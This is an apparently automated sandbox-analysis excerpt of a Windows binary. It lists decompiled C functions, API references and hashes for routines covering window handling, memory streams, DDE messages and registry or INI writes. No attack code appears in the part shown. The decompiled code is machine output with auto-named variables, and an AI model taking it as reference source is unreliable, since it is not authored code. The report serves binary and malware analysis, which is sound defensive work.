      0x009b7a1f
      0x009b7953
      0x009b7975
      0x009b7980
      0x009b7988
      0x009b7988
      0x009b7991
      0x009b799f
      0x009b79a3
      0x009b79ac
      0x009b79ae
      0x009b79b1
      0x009b79b3
      0x009b79b9
      0x009b79b5
      0x009b79b5
      0x009b79b5
      0x009b79c0
      0x009b79c0
      0x009b79c9
      0x009b79da
      0x009b79df
      0x009b79e2
      0x009b79e5
      0x009b79ea
      0x009b79f1
      0x009b79f8
      0x009b7a26

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009B78D6
      • GetDC.USER32(00000000), ref: 009B78F0
      • CreateCompatibleDC.GDI32(?), ref: 009B793C
      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 009B7964
      • ReleaseDC.USER32 ref: 009B79C9
      • ReleaseDC.USER32 ref: 009B79FF
        • Part of subcall function 009A93B2: __EH_prolog3_catch_GS.LIBCMT ref: 009A93BC
        • Part of subcall function 009BADC5: DeleteDC.GDI32(00000000), ref: 009BADD7
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CompatibleCreateRelease$BitmapDeleteH_prolog3_H_prolog3_catch_
      • String ID:
      • API String ID: 1095363469-0
      • Opcode ID: 6db2176d28a6a5dc5ecefab9f5047dfb1627a9a4de017df2b6a5369afd275ae5
      • Instruction ID: 75ec637c38332d215d57524a75d31e7fbca01c0674e380d4aa60af9003a5d473
      • Opcode Fuzzy Hash: 6db2176d28a6a5dc5ecefab9f5047dfb1627a9a4de017df2b6a5369afd275ae5
      • Instruction Fuzzy Hash: 9B41C3B1D01209DFCF01EFE4CA859EDFBB5BF88320F144669E412A7291DB359A45CB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A39D16 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E00A39D16(intOrPtr __ecx, void* __edx, void* __edi, intOrPtr _a4, long _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ebp;
				signed int* _t15;
				void* _t16;
				intOrPtr _t17;
				signed int _t19;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t38;

				_t34 = __edi;
				_t33 = __edx;
				_push(__ecx);
				_push(__ecx);
				_v12 = __ecx;
				_t36 = GlobalAlloc(2, _a8);
				if(_t36 != 0) {
					_v8 = _v8 & 0x00000000;
					E00AAB080(GlobalLock(_t36), _a4, _a8);
					_t15 =  &_v8;
					__imp__CreateStreamOnHGlobal(_t36, 0, _t15);
					__eflags = _t15;
					if(_t15 != 0) {
						goto L1;
					}
					__eflags =  *0xd11e98 - _t15;
					if( *0xd11e98 != _t15) {
						EnterCriticalSection(0xd11eb4);
					}
					_t17 =  *0xd11e60; // 0x0
					__eflags = _t17;
					if(__eflags == 0) {
						_t23 = E009A6291(__eflags, 0x34);
						_pop(_t32);
						__eflags = _t23;
						if(_t23 == 0) {
							_t17 = 0;
							__eflags = 0;
						} else {
							_t32 = _t23;
							_t17 = E009D52E2(_t23);
						}
						 *0xd11e60 = _t17;
						__eflags = _t17;
						if(_t17 == 0) {
							_t17 = E009B8782(_t32);
						}
					}
					E00A39CAD(_t17, _t33, _v8);
					_t19 = _v8;
					 *((intOrPtr*)( *_t19 + 8))(_t19);
					_t30 =  *0xd11e60; // 0x0
					_t22 = E009BB018(0xd11eb4, _v12, _t33, _t34, E009D5322(_t30));
					__eflags =  *0xd11e98;
					_t38 = _t22;
					if( *0xd11e98 != 0) {
						LeaveCriticalSection(0xd11eb4);
					}
					_t16 = _t38;
					L14:
					return _t16;
				}
				L1:
				_t16 = 0;
				goto L14;
			}


















      0x00a39d16
      0x00a39d16
      0x00a39d1b
      0x00a39d1c
      0x00a39d21
      0x00a39d2c
      0x00a39d30
      0x00a39d39
      0x00a39d4b
      0x00a39d53
      0x00a39d5a
      0x00a39d60
      0x00a39d62
      0x00000000
      0x00000000
      0x00a39d6a
      0x00a39d70
      0x00a39d73
      0x00a39d73
      0x00a39d79
      0x00a39d7e
      0x00a39d80
      0x00a39d84
      0x00a39d89
      0x00a39d8a
      0x00a39d8c
      0x00a39d97
      0x00a39d97
      0x00a39d8e
      0x00a39d8e
      0x00a39d90
      0x00a39d90
      0x00a39d99
      0x00a39d9e
      0x00a39da0
      0x00a39da2
      0x00a39da2
      0x00a39da0
      0x00a39dac
      0x00a39db1
      0x00a39db7
      0x00a39dba
      0x00a39dc9
      0x00a39dce
      0x00a39dd5
      0x00a39dd7
      0x00a39dda
      0x00a39dda
      0x00a39de0
      0x00a39de3
      0x00a39de5
      0x00a39de5
      0x00a39d32
      0x00a39d32
      0x00000000

      APIs
      • GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,00A39E5F,00000000,00000000,?,?,00A3BCA6,?,?,?,00000084), ref: 00A39D26
      • GlobalLock.KERNEL32 ref: 00A39D3E
      • _memmove.LIBCMT ref: 00A39D4B
      • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 00A39D5A
      • EnterCriticalSection.KERNEL32(00D11EB4,00000000), ref: 00A39D73
      • LeaveCriticalSection.KERNEL32(00D11EB4,00000000), ref: 00A39DDA
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
      • String ID:
      • API String ID: 861836607-0
      • Opcode ID: 59caa90c9c89e36087715a7875775e5e6a0936b56f110f1804128cfd0c407024
      • Instruction ID: eead96d4862d91065ac96c2eb73557898ee4c05a35849450dc4b37e81754dd9d
      • Opcode Fuzzy Hash: 59caa90c9c89e36087715a7875775e5e6a0936b56f110f1804128cfd0c407024
      • Instruction Fuzzy Hash: 51215E79A00315BBDB10ABF4DC4ABAF7BA8EB44391F148425F906D6251EFB1DD01C760
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B42D4 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B42D4(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E009B428D();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E009A6B56();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}








      0x009b42e1
      0x009b42e7
      0x009b4304
      0x009b4312
      0x009b431d
      0x009b431d
      0x009b431f
      0x009b4323
      0x009b432e
      0x009b4332
      0x009b433f
      0x009b433f
      0x009b4341
      0x009b4346
      0x009b434a
      0x009b4368
      0x009b435b
      0x009b435e
      0x009b4360
      0x009b4360
      0x009b434a
      0x009b4371
      0x00000000
      0x00000000
      0x00000000
      0x009b4325
      0x009b4325
      0x009b4326
      0x009b4328
      0x009b432a
      0x00000000
      0x009b4325
      0x009b4317
      0x009b4319
      0x009b431b
      0x00000000
      0x00000000
      0x00000000
      0x009b431b
      0x009b42e9
      0x009b42f0
      0x009b42ff
      0x009b42ff
      0x00000000
      0x009b42ff
      0x009b42f2
      0x009b42f9
      0x00000000
      0x00000000
      0x009b42fb
      0x00000000

      APIs
      • GetWindowLongA.USER32 ref: 009B4307
      • GetParent.USER32(009A4695), ref: 009B4315
      • GetParent.USER32(009A4695), ref: 009B4328
      • GetLastActivePopup.USER32(009A4695), ref: 009B4339
      • IsWindowEnabled.USER32(009A4695), ref: 009B434D
      • EnableWindow.USER32(009A4695,00000000), ref: 009B4360
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
      • String ID:
      • API String ID: 670545878-0
      • Opcode ID: 087227b800ba7867b917f0d4aed82d1a59341456a65d97ca4450d28219413a3e
      • Instruction ID: d67a65e0f660de4b47d802a3637b75d6b40370083abdab213a599586f99430d3
      • Opcode Fuzzy Hash: 087227b800ba7867b917f0d4aed82d1a59341456a65d97ca4450d28219413a3e
      • Instruction Fuzzy Hash: 8E11BF326066329BCF214A998B44BEA72ECAF95B75F0E0111EC11EB206D734DC01A6E1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A95B6 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E009A95B6(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t33;
				long _t37;
				void* _t40;
				void* _t55;
				intOrPtr _t64;
				void* _t65;

				_t58 = __edx;
				_t48 = __ebx;
				_push(0x18);
				E00AAD265(0xac7e54, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t65 - 0x1c)) = __ecx;
				_push(_t65 - 0x18);
				_push(_t65 - 0x20);
				_push( *((intOrPtr*)(_t65 + 0xc)));
				_push(0x3e8);
				L00AC57E6();
				_t33 = GlobalLock( *(_t65 - 0x18));
				E009A5D70(_t65 - 0x14, _t58, E009B9D52());
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				 *(_t65 - 4) = 1;
				E009A6000(_t58, __edi, _t33);
				_t37 = GlobalUnlock( *(_t65 - 0x18));
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				_push( *(_t65 - 0x18));
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push( *((intOrPtr*)(_t65 + 0xc)));
				L00AC57E0();
				_t60 =  *((intOrPtr*)(_t65 - 0x1c));
				PostMessageA( *(_t65 + 8), 0x3e4,  *( *((intOrPtr*)(_t65 - 0x1c)) + 0x20), _t37);
				if(E009B0BF8( *((intOrPtr*)(_t65 - 0x1c))) != 0) {
					_t64 =  *((intOrPtr*)(_t65 - 0x14));
					__eflags =  *((intOrPtr*)(_t64 - 4)) - 1;
					if(__eflags > 0) {
						L009A55A0(_t65 - 0x14,  *((intOrPtr*)(_t64 - 0xc)));
						_t64 =  *((intOrPtr*)(_t65 - 0x14));
					}
					_t40 = E009BD77F(_t48, _t60, _t64, __eflags);
					_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4))));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)))) + 0xbc))(_t64);
					E009A876D(_t48, _t65 - 0x14, _t60, 0xffffffff);
					_t55 = _t64 - 0x10;
				} else {
					_t55 =  *((intOrPtr*)(_t65 - 0x14)) + 0xfffffff0;
				}
				E009A5510(_t55, _t58);
				return E00AAD30A(0);
			}









      0x009a95b6
      0x009a95b6
      0x009a95b6
      0x009a95bd
      0x009a95c2
      0x009a95c8
      0x009a95cc
      0x009a95cd
      0x009a95d0
      0x009a95d5
      0x009a95dd
      0x009a95ee
      0x009a95f3
      0x009a95fb
      0x009a95ff
      0x009a9607
      0x009a960d
      0x009a9611
      0x009a9619
      0x009a961e
      0x009a961f
      0x009a9624
      0x009a9627
      0x009a962c
      0x009a9637
      0x009a9646
      0x009a966f
      0x009a9672
      0x009a9676
      0x009a967e
      0x009a9683
      0x009a9683
      0x009a9686
      0x009a968e
      0x009a9693
      0x009a969e
      0x009a96a3
      0x009a9648
      0x009a964b
      0x009a964b
      0x009a96a6
      0x009a96b2

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009A95BD
      • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 009A95D5
      • GlobalLock.KERNEL32 ref: 009A95DD
      • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 009A9607
      • ReuseDDElParam.USER32 ref: 009A9627
      • PostMessageA.USER32 ref: 009A9637
        • Part of subcall function 009B0BF8: IsWindowEnabled.USER32(?), ref: 009B0C01
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
      • String ID:
      • API String ID: 4187826474-0
      • Opcode ID: 525b01771d0787647266ccb3dbea4fd1e93552f6243c54a94d6b4d9a0d6ceac3
      • Instruction ID: 9af166b355d9fd6a79b58e160238736880345d26221525d875c84414aea3f696
      • Opcode Fuzzy Hash: 525b01771d0787647266ccb3dbea4fd1e93552f6243c54a94d6b4d9a0d6ceac3
      • Instruction Fuzzy Hash: 55213631900119ABCF01EBA0CE46BEEBB79BF45315F104629B512A71E1DB309E05DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A653C Relevance: 9.1, APIs: 6, Instructions: 65COMMON
      Download Yara Rule
      C-Code - Quality: 92%
      			E009A653C(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t17;
				signed int _t22;
				void* _t28;
				void* _t31;
				struct HWND__* _t33;
				void* _t35;

				_t31 = __edx;
				_t30 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				_t17 = GetWindow(GetDesktopWindow(), 5);
				_t33 = _t17;
				_t37 = _t33;
				if(_t33 == 0) {
					L14:
					return _t17;
				} else {
					_t28 = ShowWindow;
					_push(_t35);
					do {
						_t35 = E009AC937(_t28, _t30, _t31, _t33, _t35, _t37, _t33);
						if(_t35 != 0) {
							_t20 =  *((intOrPtr*)(_v8 + 0x20));
							if( *((intOrPtr*)(_v8 + 0x20)) != _t33 && E009A64A1(_t20, _t33) != 0) {
								_t22 = GetWindowLongA(_t33, 0xfffffff0);
								if(_a4 != 0) {
									__eflags = _t22 & 0x18000000;
									if(__eflags == 0) {
										__eflags =  *(_t35 + 0x58) & 0x00000002;
										if(__eflags != 0) {
											__eflags =  *(_v8 + 0xd4);
											if(__eflags == 0) {
												ShowWindow(_t33, 4);
												_t14 = _t35 + 0x58;
												 *_t14 =  *(_t35 + 0x58) & 0xfffffffd;
												__eflags =  *_t14;
											}
										}
									}
								} else {
									if((_t22 & 0x18000000) == 0x10000000) {
										ShowWindow(_t33, 0);
										 *(_t35 + 0x58) =  *(_t35 + 0x58) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t33, 2);
						_t33 = _t17;
					} while (_t33 != 0);
					goto L14;
				}
			}













      0x009a653c
      0x009a653c
      0x009a6541
      0x009a6545
      0x009a654f
      0x009a6555
      0x009a6557
      0x009a6559
      0x009a65e1
      0x009a65e3
      0x009a655f
      0x009a6560
      0x009a6566
      0x009a6567
      0x009a656d
      0x009a6571
      0x009a6576
      0x009a657b
      0x009a658b
      0x009a6595
      0x009a65ae
      0x009a65b3
      0x009a65b5
      0x009a65b9
      0x009a65be
      0x009a65c5
      0x009a65ca
      0x009a65cc
      0x009a65cc
      0x009a65cc
      0x009a65cc
      0x009a65c5
      0x009a65b9
      0x009a6597
      0x009a65a1
      0x009a65a6
      0x009a65a8
      0x009a65a8
      0x009a65a1
      0x009a6595
      0x009a657b
      0x009a65d3
      0x009a65d9
      0x009a65db
      0x00000000
      0x009a6567

      APIs
      • GetDesktopWindow.USER32 ref: 009A6548
      • GetWindow.USER32(00000000), ref: 009A654F
      • GetWindowLongA.USER32 ref: 009A658B
      • ShowWindow.USER32(00000000,00000000), ref: 009A65A6
      • ShowWindow.USER32(00000000,00000004), ref: 009A65CA
      • GetWindow.USER32(00000000,00000002), ref: 009A65D3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Show$DesktopLong
      • String ID:
      • API String ID: 3178490500-0
      • Opcode ID: 00d34c957a5844ea530a4a75582a0d0f6572903803e250c66720de87b785af19
      • Instruction ID: 750c2509dc3ceddec70aaa7b286cdbda051c93cc96dc45a6e87bde6e974c050b
      • Opcode Fuzzy Hash: 00d34c957a5844ea530a4a75582a0d0f6572903803e250c66720de87b785af19
      • Instruction Fuzzy Hash: 7011E731900359EBD721CB548C89F2F77EDDB82768F281109F521961D8EF74EC41D690
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B354A Relevance: 9.1, APIs: 6, Instructions: 62registryCOMMON
      Download Yara Rule
      C-Code - Quality: 71%
      			E009B354A(void* __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t29;

				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x6c));
				}
				_push(0);
				if(_a8 != 0) {
					_push(_a4);
					_t29 = E009B33F8(__ecx);
					if(_a12 != 0) {
						if(_t29 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t29, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t29);
						return 0 | _t21 == 0x00000000;
					}
					if(_t29 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t29, _a8);
					goto L10;
				}
				_t29 = E009B333D(__ecx);
				if(_t29 != 0) {
					_t21 = RegDeleteKeyA(_t29, _a4);
					goto L10;
				}
				goto L3;
			}





      0x009b3557
      0x00000000
      0x009b35d6
      0x009b3559
      0x009b355d
      0x009b357a
      0x009b3582
      0x009b3587
      0x009b359b
      0x009b356a
      0x00000000
      0x009b356a
      0x009b35b2
      0x009b35b8
      0x009b35bb
      0x00000000
      0x009b35c5
      0x009b358b
      0x00000000
      0x00000000
      0x009b3591
      0x00000000
      0x009b3591
      0x009b3564
      0x009b3568
      0x009b3572
      0x00000000
      0x009b3572
      0x00000000

      APIs
      • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 009B3572
      • RegDeleteValueA.ADVAPI32(00000000,?), ref: 009B3591
      • RegCloseKey.ADVAPI32(00000000), ref: 009B35BB
        • Part of subcall function 009B333D: RegCloseKey.KERNELBASE(?), ref: 009B33E2
        • Part of subcall function 009B333D: RegCloseKey.ADVAPI32(?), ref: 009B33EC
      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 009B35D6
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Close$Delete$PrivateProfileStringValueWrite
      • String ID:
      • API String ID: 1330817964-0
      • Opcode ID: d15a37a73f708c1077e8d77669bd722e015067b17622b1593d8233894e880234
      • Instruction ID: c5e30679e640a5168d5cf15412cd556a94132450e7cabb0f24690d63121a3038
      • Opcode Fuzzy Hash: d15a37a73f708c1077e8d77669bd722e015067b17622b1593d8233894e880234
      • Instruction Fuzzy Hash: 4B112E72401155FFCF31EFA4DD888EE3B69FB48361715C829FA1A95020D7768B52AB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BBC7B Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009BBC7B(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t8;
				struct HWND__* _t10;

				_t3 = GetFocus();
				_t10 = _t3;
				if(_t10 != 0) {
					_t8 = _a4;
					if(_t10 == _t8) {
						L10:
						return _t3;
					}
					if(E009BBA6E(_t10, 3) != 0) {
						L5:
						if(_t8 == 0 || (GetWindowLongA(_t8, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t10, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t8);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t10);
					_t10 = _t3;
					if(_t10 == _t8) {
						goto L9;
					}
					_t3 = E009BBA6E(_t10, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}







      0x009bbc81
      0x009bbc87
      0x009bbc8b
      0x009bbc8e
      0x009bbc93
      0x009bbcf1
      0x00000000
      0x009bbcf1
      0x009bbca6
      0x009bbcbd
      0x009bbcbf
      0x009bbce0
      0x009bbcea
      0x00000000
      0x009bbcd1
      0x009bbcd2
      0x009bbcd6
      0x009bbcde
      0x009bbcf0
      0x00000000
      0x009bbcf0
      0x00000000
      0x009bbcde
      0x009bbcbf
      0x009bbca9
      0x009bbcab
      0x009bbcaf
      0x00000000
      0x00000000
      0x009bbcb4
      0x009bbcbb
      0x00000000
      0x00000000
      0x00000000
      0x009bbcbb
      0x009bbcf4

      APIs
      • GetFocus.USER32(?,?,009A632A,?), ref: 009BBC81
      • GetParent.USER32(00000000), ref: 009BBCA9
        • Part of subcall function 009BBA6E: GetWindowLongA.USER32 ref: 009BBA8F
        • Part of subcall function 009BBA6E: GetClassNameA.USER32(?,?,0000000A), ref: 009BBAA4
        • Part of subcall function 009BBA6E: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 009BBABE
      • GetWindowLongA.USER32 ref: 009BBCC4
      • GetParent.USER32(?), ref: 009BBCD2
      • GetDesktopWindow.USER32 ref: 009BBCD6
      • SendMessageA.USER32 ref: 009BBCEA
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
